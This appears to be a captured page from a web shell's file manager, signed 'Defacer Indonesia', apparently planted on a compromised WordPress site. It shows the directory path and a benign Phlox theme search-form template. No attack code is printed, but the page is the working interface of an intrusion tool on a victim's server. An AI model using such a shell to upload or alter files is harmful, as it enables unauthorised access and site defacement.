whoami7 - Manager
:
/
home
/
qbizpnmr
/
public_html
/
wp-content
/
themes
/
phlox
/
Upload File:
files >> /home/qbizpnmr/public_html/wp-content/themes/phlox/searchform.php
<?php /** * The template for displaying search forms * * * @package Auxin * @author averta (c) 2014-2024 * @link http://averta.net */ ?> <form method="get" id="searchform" class="searchform" action="<?php echo esc_url( home_url( '/' ) ); ?>"> <input type="text" class="field" name="s" id="s" placeholder="<?php esc_attr_e( 'Search Here', 'phlox'); ?>" value="<?php the_search_query(); ?>" /> <input type="submit" class="submit" name="submit" id="searchsubmit" value="<?php esc_attr_e( 'Search', 'phlox'); ?>" /> </form>
Copyright ©2021 || Defacer Indonesia